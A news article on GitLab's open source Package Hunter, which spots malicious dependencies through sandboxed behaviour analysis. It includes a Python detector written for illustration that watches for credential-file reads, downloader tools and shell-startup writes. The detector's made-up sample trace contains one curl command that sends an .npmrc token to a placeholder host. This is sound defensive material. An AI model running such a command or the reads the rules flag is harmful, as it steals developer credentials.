
GitLab’s open source Package Hunter detects malicious code in dependencies

GitLab Package Hunter
Image Credit: GitLab




GitLab recently launched a new open source tool to detect malicious code in software components.

Modern software depends on dozens or hundreds of third-party packages, some of which may not be actively maintained or monitored for vulnerabilities. Package Hunter, which integrates directly with GitLab’s continuous integration (CI) platform, installs and runs a project’s dependencies in an isolated testing environment known as a sandbox and uses “dynamic behavior analysis” (observing what the code actually does at runtime rather than inspecting its source) to spot malicious packages that attempt to extract sensitive data or otherwise run unintended code.

“Any suspicious system calls are reported to the user for further examination,” GitLab security researcher Dennis Appelt wrote in a blog post.
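To make the "dynamic behavior analysis" idea concrete, here is a small rule-based analyzer over a syscall trace of the kind a sandbox monitor records while dependencies are installed. This is an added example written for this article, not Package Hunter's own code; the event format (one dict per syscall with `pid`, `syscall` and a few arguments), the allowed-host list, the path patterns and the two sample traces are all constructed here for illustration. It flags the behaviours the article mentions: reading credential files, contacting hosts other than the package registry, spawning downloaders, and writing to shell-startup files.

```python
"""
Toy dynamic-behaviour analysis over a constructed syscall trace.

Added example, not Package Hunter's code. Assumes a sandbox tracer has
already produced a list of syscall events recorded during a dependency
install; the event schema and the detection rules are assumptions.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str    # which detection rule fired
    pid: int     # process that performed the call
    detail: str  # human-readable summary for the report


# Hosts a package install is expected to contact (assumed registry list).
ALLOWED_HOSTS = {"registry.npmjs.org", "registry.yarnpkg.com"}

# Credential and key material a build script has no business reading.
SENSITIVE_PATH_PATTERNS = [
    re.compile(r"^/(root|home/[^/]+)/\.ssh/"),
    re.compile(r"^/(root|home/[^/]+)/\.aws/credentials$"),
    re.compile(r"^/(root|home/[^/]+)/\.npmrc$"),
    re.compile(r"^/etc/shadow$"),
]

# Persistence locations an install step should never write to.
PERSISTENCE_PATH_PATTERNS = [
    re.compile(r"^/(root|home/[^/]+)/\.(bashrc|profile|zshrc)$"),
    re.compile(r"^/etc/cron"),
]

# Tools commonly used to pull or push data from a build container.
DOWNLOADER_BINARIES = {"curl", "wget", "nc", "ncat"}


def _basename(path):
    return path.rsplit("/", 1)[-1]


def _matches(path, patterns):
    return any(p.search(path) for p in patterns)


def analyze_trace(events):
    """Return a list of Finding objects, one per suspicious syscall event."""
    findings = []
    for ev in events:
        name, pid = ev["syscall"], ev["pid"]
        if name == "connect":
            host = ev.get("host", "")
            if host not in ALLOWED_HOSTS:
                findings.append(Finding("unexpected_network", pid,
                                        f"connect to {host}:{ev.get('port')}"))
        elif name in ("open", "openat"):
            path = ev["path"]
            if _matches(path, SENSITIVE_PATH_PATTERNS):
                findings.append(Finding("sensitive_file_read", pid, f"open {path}"))
            elif ev.get("write") and _matches(path, PERSISTENCE_PATH_PATTERNS):
                findings.append(Finding("persistence_write", pid, f"write {path}"))
        elif name == "execve":
            argv = ev["argv"]
            binary = _basename(argv[0])
            if binary in DOWNLOADER_BINARIES:
                findings.append(Finding("downloader_exec", pid, " ".join(argv)))
            elif binary in ("sh", "bash") and "-c" in argv:
                # Inspect the command string handed to the shell.
                idx = argv.index("-c")
                cmd = argv[idx + 1] if idx + 1 < len(argv) else ""
                if any(_basename(tok) in DOWNLOADER_BINARIES for tok in cmd.split()):
                    findings.append(Finding("shell_downloader", pid, cmd))
    return findings


def is_clean(events):
    """True when the trace produced no findings."""
    return not analyze_trace(events)


# Constructed trace of a benign install: talks to the registry, reads its own files.
BENIGN_TRACE = [
    {"pid": 100, "syscall": "execve", "argv": ["/usr/bin/node", "install.js"]},
    {"pid": 100, "syscall": "connect", "host": "registry.npmjs.org", "port": 443},
    {"pid": 100, "syscall": "openat", "path": "/home/ci/project/package.json", "write": False},
    {"pid": 100, "syscall": "openat", "path": "/home/ci/project/node_modules/left-pad/index.js", "write": False},
]

# Constructed trace of a suspicious install script (hostnames are placeholders).
SUSPICIOUS_TRACE = BENIGN_TRACE + [
    {"pid": 102, "syscall": "execve", "argv": ["/bin/sh", "-c", "curl -s https://example.invalid/collect -d @/home/ci/.npmrc"]},
    {"pid": 102, "syscall": "openat", "path": "/home/ci/.npmrc", "write": False},
    {"pid": 103, "syscall": "execve", "argv": ["/usr/bin/curl", "-s", "https://example.invalid/collect"]},
    {"pid": 103, "syscall": "connect", "host": "example.invalid", "port": 443},
    {"pid": 104, "syscall": "openat", "path": "/home/ci/.bashrc", "write": True},
]


if __name__ == "__main__":
    for f in analyze_trace(SUSPICIOUS_TRACE):
        print(f"[{f.rule}] pid={f.pid} {f.detail}")
```

The rules are deliberately narrow allow-lists rather than signatures of specific malware: a build step that needs the registry, its own working tree and nothing else is the expected baseline, so anything outside that baseline is reported for a human to examine, which is the same reporting model the quote above describes.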


Pros and cons

While the benefits of open source software are well understood, the vast majority of codebases contain at least one known open source vulnerability, according to a recent Synopsys report. Another report also concluded that, more often than not, developers don’t bother updating the third-party libraries they use in their software.

But the growing scourge of supply chain attacks, which target businesses by exploiting vulnerabilities in “trusted” third-party hardware and software, has seemingly accelerated industry efforts to bolster defenses against threats like those that emerged in the high-profile infiltration of IT infrastructure company SolarWinds. That attack opened access to sensitive data at thousands of organizations, from Microsoft to government agencies.

Google recently introduced a new end-to-end framework for “ensuring the integrity of software artifacts throughout the software supply chain,” which essentially amounts to a set of certification levels that verify what security processes a particular open source software package has in place. The internet giant also launched the Open Source Vulnerabilities database to improve vulnerability triage for developers.

GitLab quietly announced Package Hunter back in December and has been running the prototype internally since. But as of July 23, the company has made it available under a permissive MIT license for anyone to use.
